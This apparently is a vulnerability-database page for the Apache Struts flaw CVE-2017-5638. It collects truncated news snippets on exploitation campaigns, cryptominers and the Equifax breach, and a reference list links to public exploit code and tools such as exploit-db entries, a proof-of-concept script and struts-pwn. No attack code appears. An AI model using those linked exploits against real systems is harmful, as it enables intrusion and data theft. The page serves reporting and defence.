After last week a security researcher revealed a vulnerability in Apache Struts, a piece of very popular enterprise software, active exploitation attempts have started this week.
The vulnerability in question is tracked as CVE-2018-11776, a remote code execution flaw that allows an attacker to gain control over Struts-based web applications.
The vulnerability is not exploitable in default Struts configurations, according to an analysis by Palo Alto Networks, but the flaw is of intere...

MassMiner Takes a Kitchen-Sink Approach to Cryptomining
Threatpost • Tara Seals • 03 May 2018

Though it falls squarely into the trend of cryptominers setting their sights on the Monero virtual currency, the MassMiner malware family is adding its own special somethin’-somethin’ to the mix. It targets Windows servers with a variety of recent and well-known exploits – all within a single executable.
In fact, MassMiner uses a veritable cornucopia of attacks: The EternalBlue National Security Agency hacking tool (CVE-2017-0143), which it uses to install DoublePulsar and the Gh0st ...

New MassMiner Malware Targets Web Servers With an Assortment of Exploits
BleepingComputer • Catalin Cimpanu • 02 May 2018

Security researchers have detected a new wave of cryptocurrency-mining malware infecting servers across the web, and this one is using multiple exploits to gain access to vulnerable and unpatched systems to install a Monero miner.
Experts from AlienVault say this new campaign —which they dubbed MassMiner— uses exploits for vulnerabilities such as CVE-2017-10271 (Oracle WebLogic), CVE-2017-0143 (Windows SMB), and CVE-2017-5638 (Apache Struts).
The MassMiner crew sure has an excell...

Equifax Adds 2.4 Million More People to List of Those Impacted By 2017 Breach
Threatpost • Lindsey O'Donnell • 02 Mar 2018

Equifax said that an additional 2.4 million Americans have had their personal data stolen as part of the company’s massive 2017 data breach, including their names and some of their driver’s license information.
The additional identified victims bring the total of those implicated in what has become the largest data breach of personal information in history to around 148 million people.
The consumer credit reporting agency on Thursday said that as part of an “ongoing analysis”...

Malware Epidemic: Monero Mining Campaigns Are Becoming a Real Problem
BleepingComputer • Catalin Cimpanu • 25 Jan 2018

Malware that secretly mines Monero is becoming a real problem in the real world, with the number of different incidents growing with each week. For example, only this past week, three new attacks came to light.
The reason is simple and is the same one given by all security experts who paid close attention to the cryptocurrency market in the past year.
The number of malware campaigns spreading Monero-mining threats grew exponentially with Monero's trading price. As the price rose, the...

"Zealot" Campaign Uses NSA Exploits to Mine Monero on Windows and Linux Servers
BleepingComputer • Catalin Cimpanu • 16 Dec 2017

An aggressive and sophisticated malware campaign is currently underway, targeting Linux and Windows servers with an assortment of exploits with the goal of installing malware that mines the Monero cryptocurrency.
The campaign was detected by security researchers from F5 Networks, who named it Zealot, after zealot.zip, one of the files dropped on targeted servers.
According to Maxim Zavodchik and Liron Segal, two security researchers for F5 Networks, the attackers are scanning the Int...

IRS tax bods tell Americans to chill out about Equifax
The Register • Richard Chirgwin • 18 Oct 2017

Your personal data was probably already in crims' hands

The United States Internal Revenue Service has said that citizens affected by the Equifax breach need not panic, because it probably didn't reveal anything that hasn't already been stolen and the agency has tooled up to deal with fraudulent tax claims.
Commissioner John Koskinen, discussing whether the breach would interfere with tax collection, told journalists “a significant percent of those taxpayers already had their information in the hands of criminals”, according to a report of ...

Oracle Patches 250 Bugs in Quarterly Critical Patch Update
Threatpost • Tom Spring • 17 Oct 2017

Oracle patched 250 vulnerabilities across hundreds of different products as part of its quarterly Critical Patch Update released today.
Rounding out the list of products with the most patches is Oracle Fusion Middleware with 38, Oracle Hospitality Applications with 37 and Oracle MySQL with 25.
Of the critical patches, security researchers at Onapsis said that they identified three high-risk SQL injections vulnerabilities in Oracle’s popular Oracle E-Business Suite (EBS).
“W...

Sole Equifax security worker at fault for failed patch, says former CEO
The Register • Simon Sharwood • 04 Oct 2017

Someone failed to order the patch. If it was you, c'mere, have a hug. And a new identity

Recently-and-forcibly-retired Equifax CEO Rick Smith has laid the blame for his credit-check biz's IT security breach on a single member of the company's security team.
In testimony on Tuesday before a US House subcommittee on consumer protection, Smith explained that Equifax has a protocol whereby news of important software patches is communicated to the appropriate people within a certain time. When details of security vulnerability CVE-2017-5638 landed in March 2017, bearing bad news ab...

Equifax Says 145.5M Affected by Breach, Ex-CEO Testifies
Threatpost • Chris Brook • 03 Oct 2017

Equifax, the credit agency behind this summer’s breach of 143 million Americans, said this week the number of victims implicated in the breach has increased.
Paulino do Rego Barros, Jr., the company’s interim CEO, announced Monday that 2.5 million additional Americans were also impacted, bringing the grand total to 145.5 million affected individuals.
Equifax initially called its investigation around the breach “substantially complete,” but said it was still carrying out furth...

Equifax couldn't find or patch vulnerable Struts implementations
The Register • Richard Chirgwin • 02 Oct 2017

Ex-CEO says company stayed silent about hack to stop crims piling on with more attacks

Equifax was just as much of a trash-fire as it looked: the company saw the Apache Struts 2 vulnerability warning, failed to patch its systems, and held back a public announcement for weeks for fear of “copycat” attacks.
Those Infosec for Absolute Dummies tips were made official by ex-CEO Richard Smith, by way of evidence published by a US House committee ahead of his in-person appearance Tuesday.
Smith's written statement [PDF] to the House Committee on Energy and Commerce says t...

Oracle Patches Apache Struts, Reminds Users to Update Equifax Bug
Threatpost • Chris Brook • 26 Sep 2017

Oracle released fixes for a handful of recently patched Apache Struts 2 vulnerabilities, including a critical remote code execution vulnerability (CVE-2017-9805) that could let an attacker take control of an affected system, late last week.
The Apache Software Foundation patched the RCE vulnerability, which affects servers running apps built using the Struts framework and its REST communication plugin, earlier this month.
Scores of Oracle products, roughly two dozen in total, are aff...

Equifax's disastrous Struts patching blunder: THOUSANDS of other orgs did it too
The Register • John Leyden • 20 Sep 2017

Those are just the ones known to have downloaded outdated versions

Thousands of companies may be susceptible to the same type of hack that recently struck Equifax.
The Equifax breach was the result of a vulnerable Apache Struts component. Software automation vendor Sonatype warns that 3,054 organisations downloaded the same Struts2 component exploited in the Equifax hack in the last 12 months. The affected version of Struts2 was publicly disclosed as vulnerable (CVE-2017-5638) on March 10, and was subsequently exploited at Equifax between May and late Jul...

Equifax's IT leaders 'retire' as company says it knew about the bug that brought it down
The Register • Simon Sharwood, APAC Editor • 17 Sep 2017

Company tried to find and patch vulnerable systems, but we know what happened next

Equifax's chief information officer and chief security officer “are retiring” and the company has admitted it knew Apache Struts needed patching in March, but looks to have fluffed attempts to secure the software.
The retirements and more details about the company's mega-breach are revealed in a new entry to equifaxsecurity2017.com in which the company describes what it knew, when it knew it, and how it responded.
The update reveals that the the attack hit the company's “U.S. o...

Equifax Releases New Information About Security Breach as Top Execs Step Down
BleepingComputer • Catalin Cimpanu • 16 Sep 2017

In a press release published late Friday night, credit rating and reporting firm Equifax revealed new details about the security breach that exposed the personal details of over 143 million users, and also announced the immediate retirement of two high-ranking executives.
Equifax says that breach came to light on July 29 when its security team observed suspicious traffic from its US online dispute portal. Its security team blocked the traffic, but the next day, July 30, more suspicious act...

Equifax mega-breach: Security bod flags header config conflict
The Register • John Leyden • 15 Sep 2017

Help wanted at Equifax. Badly

Further evidence has emerged regarding the insecurity of Equifax’s web setup, as independent security researcher Scott Helme reports having uncovered all manner of problems with Equifax’s security header configuration.
The finding from Helme comes as a date was confirmed for the Equifax CEO to appear before Congress earlier next month, and the FTC said it was investigating the credit reference agency.
“Many of the headers are more about addressing the basics, but as a site that...

Equifax Confirms March Struts Vulnerability Behind Breach
Threatpost • Chris Brook • 14 Sep 2017

Equifax said the culprit behind this summer’s massive breach of 143 million Americans was indeed CVE-2017-5638, an Apache Struts vulnerability patched back in March.
The bug was widely assumed by experts to be the “U.S. website application vulnerability” implicated by the company last Thursday, especially after an Apache spokeswoman told Reuters on Friday that it appeared the consumer credit reporting agency hadn’t applied patches for flaws discovered earlier this year.
On We...

Missed patch caused Equifax data breach
The Register • Simon Sharwood, APAC Editor • 14 Sep 2017

Apache Struts was popped, but company had at least TWO MONTHS to fix it

Equifax has revealed that the cause of its massive data breach was a flaw it should have patched weeks before it was attacked.
The company has updated its www.equifaxsecurity2017.com/ site with a new “A Progress Update for Consumers” that opens as follows:
As the Apache Foundation pointed out earlier this week, it reported CVE-2017-5638 in March 2017. Doubt us? Here's the NIST notification that mentions it as being notified on March 10th.
Equifax was breached in “mid-May...

Equifax Confirms Hackers Used Apache Struts Vulnerability to Breach Its Servers
BleepingComputer • Catalin Cimpanu • 14 Sep 2017

In an update posted to its security breach website, Equifax said hackers used an Apache Struts security bug to breach its servers and later steal data on over 143 million customers, from both the US and the UK. We quote:
Equifax's confirmation comes after a report from equity research firm Baird circulated last week blaming the same flaw.
At the time it was discovered, in March 2017, the Apache Struts CVE-2017-5638 vulnerability was a zero-day — a term used to describe security bug...

Credit reference agencies faulted for poor patching
The Register • John Leyden • 13 Sep 2017

Hold our beers, Equifax

Updated Experian and Annual Credit Report.com – an organization set up by Equifax, Experian and Transunion to meet US consumer finance regulations – left themselves exposed to a serious vulnerability in Apache Struts earlier this year.
The security shortcoming raises important questions following the disclosure of a mega-breach at Equifax last week that affected data on 143 million Americans and an as-yet unknown number of Canadians and Brits. Equifax only said that an unspecified web ...

Apache Foundation Refutes Involvement in Equifax Breach
Threatpost • Chris Brook • 11 Sep 2017

A group of developers behind Apache Struts, believed by some to be the culprit behind last week’s Equifax breach, took umbrage with those claims over the weekend.
René Gielen, vice president of the Apache Struts Project Management Committee (PMC) at the Apache Software Foundation, wrote Saturday that if Struts was targeted, it’s unclear which vulnerability, if any was exploited.
The letter, which was written on behalf of the Struts PMC, was spurred by an internal analyst report...

Apache Struts Vulnerabilities May Affect Many of Cisco's Products
BleepingComputer • Catalin Cimpanu • 11 Sep 2017

Cisco has initiated a mass security audit of all its products that incorporate a version of the Apache Struts framework, recently affected by a series of vulnerabilities, one of which is under active exploitation.
Cisco engineers will test all the software products for four Apache Struts security bugs disclosed last week.
The company is keeping a list of To-Be-Tested, Vulnerable, and Confirmed Not Vulnerable products in two security advisories, here and here.
The first Cisco se...

Patch Released for Critical Apache Struts Bug
Threatpost • Tom Spring • 05 Sep 2017

The Apache Software Foundation has patched a critical remote code execution vulnerability affecting all versions of the popular application development framework Struts since 2008.
All web applications using the framework’s REST plugin are vulnerable. Users are advised to upgrade their Apache Struts components as a matter of urgency, according to Semmle, a software engineering analytics firm that first identified the bug.
“This particular vulnerability allows a remote attacker t...

Ransomware Gang Made Over $100,000 by Exploiting Apache Struts Zero-Day
BleepingComputer • Catalin Cimpanu • 06 Apr 2017

For more than a month, at least ten groups of attackers have been compromising systems running applications built with Apache Struts and installing backdoors, DDoS bots, cryptocurrency miners, or ransomware, depending if the machine is running Linux or Windows.
For their attacks, the groups are using a zero-day in Apache Struts, disclosed and immediately fixed last month by Apache.
The vulnerability, CVE-2017-5638, allows an attacker to execute commands on the server via content uplo...

Attacks Heating Up Against Apache Struts 2 Vulnerability
Threatpost • Michael Mimoso • 09 Mar 2017

Public attacks and scans looking for exposed Apache webservers have ramped up dramatically since Monday when a vulnerability in the Struts 2 web application framework was patched and proof-of-concept exploit code was introduced into Metasploit.
The vulnerability, CVE-2017-5638, was already under attack in the wild prior to Monday’s disclosure, but since then, the situation has worsened and experts fear it’s going to linger for a while.
“The second someone starts working on a Me...

Apache Struts 2 needs patching, without delay. It's under attack now
The Register • Richard Chirgwin • 09 Mar 2017

Black hats testing remote code execution zero-day vulnerability

Infosec researchers have found a “dire” zero-day in Apache Struts 2, and it's under active attack.
If you're a sysadmin using the Jakarta-based file upload Multipart parser under Apache Struts 2, Nick Biasini of Cisco's Talos advises applying the latest upgrade immediately.
CVE-2017-5638 is documented at Rapid7's Metasploit Framework GitHub site.
Talos's input adds urgency to getting the upgrade, because the organisation “found a high number of exploitation events. The ma...

Apache Struts Zero-Day Exploited in the Wild
BleepingComputer • Catalin Cimpanu • 09 Mar 2017

Cisco's Talos security team announced it discovered attacks against a zero-day vulnerability in Apache Struts, which Apache patched on Monday.
According to its website, "Apache Struts is a free, open-source, MVC framework for creating elegant, modern Java web applications. It favors convention over configuration, is extensible using a plugin architecture, and ships with plugins to support REST, AJAX and JSON."
The vulnerability, CVE-2017-5638, allows an attacker to execute commands o...

References

CWE-20http://blog.talosintelligence.com/2017/03/apache-0-day-exploited.htmlhttp://blog.trendmicro.com/trendlabs-security-intelligence/cve-2017-5638-apache-struts-vulnerability-remote-code-execution/http://www.arubanetworks.com/assets/alert/ARUBA-PSA-2017-002.txthttp://www.eweek.com/security/apache-struts-vulnerability-under-attack.htmlhttp://www.oracle.com/technetwork/security-advisory/cpujul2017-3236622.htmlhttp://www.securityfocus.com/bid/96729http://www.securitytracker.com/id/1037973https://arstechnica.com/security/2017/03/critical-vulnerability-under-massive-attack-imperils-high-impact-sites/https://cwiki.apache.org/confluence/display/WW/S2-045https://cwiki.apache.org/confluence/display/WW/S2-046https://exploit-db.com/exploits/41570https://git1-us-west.apache.org/repos/asf?p=struts.git;a=commit;h=352306493971e7d5a756d61780d57a76eb1f519ahttps://git1-us-west.apache.org/repos/asf?p=struts.git;a=commit;h=6b8272ce47160036ed120a48345d9aa884477228https://github.com/mazen160/struts-pwnhttps://github.com/rapid7/metasploit-framework/issues/8064https://h20566.www2.hpe.com/hpsc/doc/public/display?docLocale=en_US&docId=emr_na-hpesbgn03733en_ushttps://h20566.www2.hpe.com/hpsc/doc/public/display?docLocale=en_US&docId=emr_na-hpesbgn03749en_ushttps://h20566.www2.hpe.com/hpsc/doc/public/display?docLocale=en_US&docId=emr_na-hpesbhf03723en_ushttps://isc.sans.edu/diary/22169https://nmap.org/nsedoc/scripts/http-vuln-cve2017-5638.htmlhttps://packetstormsecurity.com/files/141494/S2-45-poc.py.txthttps://security.netapp.com/advisory/ntap-20170310-0001/https://struts.apache.org/docs/s2-045.htmlhttps://struts.apache.org/docs/s2-046.htmlhttps://support.lenovo.com/us/en/product_security/len-14200https://twitter.com/theog150/status/841146956135124993https://www.exploit-db.com/exploits/41614/https://www.imperva.com/blog/2017/03/cve-2017-5638-new-remote-code-execution-rce-vulnerability-in-apache-struts-2/https://www.kb.cert.org/vuls/id/834067https://www.symantec.com/security-center/network-protection-security-advisories/SA145https://www.rapid7.com/db/vulnerabilities/oracle-weblogic-cve-2017-5638https://tools.cisco.com/security/center/viewAlert.x?alertId=52972https://www.exploit-db.com/exploits/41570/https://nvd.nist.govhttps://www.kb.cert.org/vuls/id/834067